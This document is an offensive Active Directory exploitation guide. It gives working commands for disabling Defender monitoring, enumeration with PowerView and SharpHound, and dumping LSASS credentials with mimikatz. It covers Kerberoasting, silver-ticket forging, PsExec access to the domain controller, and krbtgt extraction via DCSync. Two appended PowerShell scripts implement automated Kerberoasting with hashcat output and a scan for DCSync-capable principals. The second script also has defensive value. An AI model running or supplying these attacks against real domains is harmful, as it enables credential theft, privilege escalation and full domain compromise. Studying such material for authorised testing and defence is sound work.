
Active Directory Exploitation



Overview


AD: General Pathways

A few of the many exploitation pathways:

Methods:


AD: Enumeration and Assessment

After gaining access to a machine within an AD network, the first job is to enumerate the environment: the network, the domain (and any trusts), the machines in it, and where the compromised machine and its current user stand in relation to everything else (group memberships, ACLs, local admin rights on other hosts, and the shortest route to Domain Admins).

Enumeration of AD can be done in various ways and many tools exist. Among the most popular and useful are SharpHound/BloodHound, PowerView, Impacket, and of course plain PowerShell (the built-in .NET LDAP classes work without dropping any tooling on the host).


Useful Resources:

https://wadcoms.github.io/

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology


Tools


Powerview

Disable Monitoring (requires local admin; fails silently when Tamper Protection is on, and the change itself is logged, so check the situation before running it)

Set-MpPreference -DisableRealtimeMonitoring $true

Get Domain Info

Get-Domain                                      # current domain object
Get-DomainController                            # DCs of the current domain
Get-Domain -Domain domain.local                 # same, for another (trusted) domain
Get-DomainController -Domain domain.local
Get-DomainUser                                  # all user objects (-SPN limits it to Kerberoastable accounts)
Get-DomainSID                                   # domain SID, needed later for golden/silver tickets
Get-DomainPolicy                                # domain GPO policy
(Get-DomainPolicy)."SystemAccess"               # password and lockout policy: check the lockout threshold before spraying
Invoke-ShareFinder                              # shares readable by the current user
Invoke-MapDomainTrust                           # domain and forest trusts

Using Bloodhound

Transfer SharpHound to the host, run the collector, exfiltrate the resulting zip, import it into BloodHound, then query for high-value accounts and attack paths (shortest path to Domain Admins, Kerberoastable users, sessions of privileged users on machines you can reach) and use the relevant tools to abuse those accounts and move laterally. Collection methods are comma-separated without spaces:

.\SharpHound.exe -c Default,GPOLocalGroup,LoggedOn --zipfilename output

Use mimikatz (as local admin or SYSTEM on the compromised host) to dump the credentials cached in LSASS for every account that has logged on there: NTLM hashes, Kerberos keys and, where WDigest caching is still enabled, plaintext passwords. Anything belonging to a more privileged account can be reused for further exploitation:

privilege::debug

sekurlsa::logonPasswords

Pass the Ticket Example

Identify service principals:

Request a service ticket (TGS) for the target SPN. Any authenticated domain user can do this, and the ticket's encrypted part is protected with the service account's password hash, so an exported ticket can be cracked offline (Kerberoasting). This can be done with mimikatz or via PowerShell:

PowerShell method (SPN is the full service principal name in class/host[:port] form, for example MSSQLSvc/sql01.corp.com:1433):

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPN'

The ticket now sits in the current logon session's cache (klist shows it) and can be exported with mimikatz as below.

mimikatz method, after picking an SPN that gives domain controller access or access useful for lateral movement (the example uses an MSSQL service; /target takes the full SPN, not just the service name):

kerberos::purge
kerberos::list
kerberos::ask /target:MSSQLSvc/<host>.corp.com:1433
kerberos::list /export

Once the service account's password (and therefore its NTLM hash) has been recovered from the exported ticket, forge a silver ticket for that service and inject it into the current session with /ptt. /target is the FQDN of the host running the service, /service must match the service class of the SPN the client will request (MSSQLSvc here), /rc4 is the service account's NTLM hash, and the /user value is only checked if the service performs PAC validation. The ticket is built locally and the DC is never contacted:

kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-21-xxx-xxxx-xxxxx /target:<host>.corp.com /service:MSSQLSvc /rc4:<service-account-NTLM-hash> /ptt
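The two steps above (find accounts with an SPN, then request a ticket for each with KerberosRequestorSecurityToken) combined into one script, as an added example that is not part of the original page. It uses only the .NET classes already on a domain-joined Windows host, so it runs as an ordinary domain user without PowerView, and it carves the encrypted part of the returned AP-REQ into hashcat's $krb5tgs$23$ format instead of exporting .kirbi files; the carving regex mirrors the one PowerView's Get-DomainSPNTicket uses. Function names are mine, and the realm is assumed to be available in $env:USERDNSDOMAIN.

```powershell
# Added example, not from the original page. Assumes a domain-joined host and a domain user context.
Add-Type -AssemblyName System.IdentityModel

function Get-RoastableAccount {
    # Enabled user (not computer) accounts with at least one SPN; krbtgt's ticket is not worth cracking
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(samAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'serviceprincipalname', 'distinguishedname', 'pwdlastset'))
    foreach ($r in $searcher.FindAll()) {
        [pscustomobject]@{
            SamAccountName = [string]$r.Properties['samaccountname'][0]
            SPN            = [string]$r.Properties['serviceprincipalname'][0]   # one SPN is enough to get a ticket
            DN             = [string]$r.Properties['distinguishedname'][0]
            PwdLastSet     = [datetime]::FromFileTime([int64]$r.Properties['pwdlastset'][0])   # old passwords crack more often
        }
    }
}

function ConvertTo-TgsHash {
    param([byte[]]$ApReq, [string]$User, [string]$Realm, [string]$Spn)
    # Inside the AP-REQ the ticket's enc-part is: a3 82 LL LL 30 82 LL LL a0 03 02 01 <etype> a1 .. <kvno> a2 82 LL LL 04 82 LL LL <cipher> a4 82 <authenticator>
    $hex = ([System.BitConverter]::ToString($ApReq)) -replace '-'
    if ($hex -notmatch 'a382....3082....A0030201(?<Etype>..)A1.{1,4}.......A282(?<CipherLen>....)........(?<Rest>.+)') { return $null }
    $etype     = [Convert]::ToByte($Matches.Etype, 16)
    $cipherLen = [Convert]::ToUInt32($Matches.CipherLen, 16) - 4     # a2 length includes the 4-byte OCTET STRING header
    $cipher    = $Matches.Rest.Substring(0, $cipherLen * 2)
    # The authenticator tag (a4 82) must follow immediately, otherwise the length parsing went wrong
    if ($Matches.Rest.Substring($cipherLen * 2, 4) -ne 'A482') { return $null }
    if ($etype -ne 23) {
        # AES tickets (etype 17/18) use a different layout (hashcat 19600/19700); not handled in this example
        Write-Warning "$User : ticket is etype $etype (AES), skipping"
        return $null
    }
    # hashcat mode 13100: $krb5tgs$23$*user$realm$spn*$checksum(16 bytes)$edata2
    return ('$krb5tgs$23$*{0}${1}${2}*${3}${4}' -f $User, $Realm, $Spn, $cipher.Substring(0, 32), $cipher.Substring(32))
}

function Invoke-TgsRoast {
    param([string]$Realm = $env:USERDNSDOMAIN)
    foreach ($acct in Get-RoastableAccount) {
        try {
            # Requesting the token makes the KDC issue a TGS for the SPN; GetRequest() returns the AP-REQ bytes
            $token = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $acct.SPN
            $hash  = ConvertTo-TgsHash -ApReq $token.GetRequest() -User $acct.SamAccountName -Realm $Realm -Spn $acct.SPN
            [pscustomobject]@{ User = $acct.SamAccountName; SPN = $acct.SPN; PwdLastSet = $acct.PwdLastSet; Hash = $hash }
        } catch {
            Write-Warning "Ticket request failed for $($acct.SPN): $($_.Exception.Message)"
        }
    }
}

# Usage:
#   Invoke-TgsRoast | Where-Object Hash | ForEach-Object Hash | Out-File -Encoding ascii hashes.txt
#   hashcat -m 13100 hashes.txt wordlist.txt
```

Every ticket request is a normal TGS-REQ, so nothing here needs elevated rights; the trade-off is that each one produces a 4769 event on the DC for that SPN, which is exactly what detections for Kerberoasting look for (many RC4 service ticket requests from one user in a short time).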


Accessing the DC with Admin privileges:

With a domain admin (or equivalent) context in the current session, get a shell on the DC with PsExec, or just mount its admin share (cmd.exe's cd does not accept UNC paths, pushd does):

PsExec64.exe \\domain-dc01 cmd.exe
pushd \\domain-dc01\c$

Extract the krbtgt secret. DCSync asks the DC to replicate the account over the directory replication service (DRSUAPI), so it works from any domain-joined host whose current user holds the replication rights (Domain Admins and Enterprise Admins by default) without ever running code on the DC:

lsadump::dcsync /user:krbtgt

Alternatively, on the DC itself (as local admin or SYSTEM), read it straight out of LSASS:

lsadump::lsa /inject /name:krbtgt
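DCSync only works for a principal that holds both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All (or something that implies them) on the domain head. The following script, added here as an example and not part of the original page, reads that ACL with the built-in .NET DirectoryEntry class and reports who can DCSync, so the attacker knows which account to impersonate and a defender can spot grantees that should not be there. It assumes a domain-joined host, uses $env:USERDNSDOMAIN for the domain name, and the function name is mine; the extended-right GUIDs are the standard schema values.

```powershell
# Added example, not from the original page. Assumes a domain-joined host; any domain user can read the domain head's ACL.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DCSyncPrincipal {
    param([string]$Domain = $env:USERDNSDOMAIN)
    # RootDSE gives the domain naming context so nothing is hardcoded
    $rootDse    = [adsi]"LDAP://$Domain/RootDSE"
    $domainDN   = [string]$rootDse.defaultNamingContext
    $domainHead = [adsi]"LDAP://$Domain/$domainDN"
    $rules = $domainHead.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])

    $extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $genericAll    = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $found = @{}
    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid = $ace.ObjectType.ToString()
        $hasExtended = (($ace.ActiveDirectoryRights -band $extendedRight) -ne 0)
        # GenericAll on the domain head implies every extended right, replication included
        if (($ace.ActiveDirectoryRights -band $genericAll) -eq $genericAll) { $right = 'GenericAll' }
        elseif ($hasExtended -and $ReplicationRights.ContainsKey($guid)) { $right = $ReplicationRights[$guid] }
        # An ExtendedRight ACE with the null GUID grants all extended rights
        elseif ($hasExtended -and $guid -eq '00000000-0000-0000-0000-000000000000') { $right = 'All extended rights' }
        else { continue }

        $who = $ace.IdentityReference.Value
        if (-not $found.ContainsKey($who)) { $found[$who] = New-Object System.Collections.Generic.List[string] }
        if (-not $found[$who].Contains($right)) { $found[$who].Add($right) }
    }

    foreach ($who in ($found.Keys | Sort-Object)) {
        $rights = $found[$who]
        # Both Get-Changes and Get-Changes-All are required; GenericAll or all-extended-rights covers both
        $canDcsync = ($rights -contains 'GenericAll') -or ($rights -contains 'All extended rights') -or
                     (($rights -contains 'DS-Replication-Get-Changes') -and ($rights -contains 'DS-Replication-Get-Changes-All'))
        [pscustomobject]@{ Principal = $who; Rights = ($rights -join ', '); CanDCSync = $canDcsync }
    }
}

# Usage: Get-DCSyncPrincipal | Format-Table -AutoSize
```

The built-in grantees you expect to see are Administrators, Domain Controllers and Enterprise Domain Controllers (plus Enterprise Admins and Domain Admins through their memberships); any other principal flagged CanDCSync is either a misconfiguration worth exploiting or, from the defender's side, a persistence backdoor worth investigating.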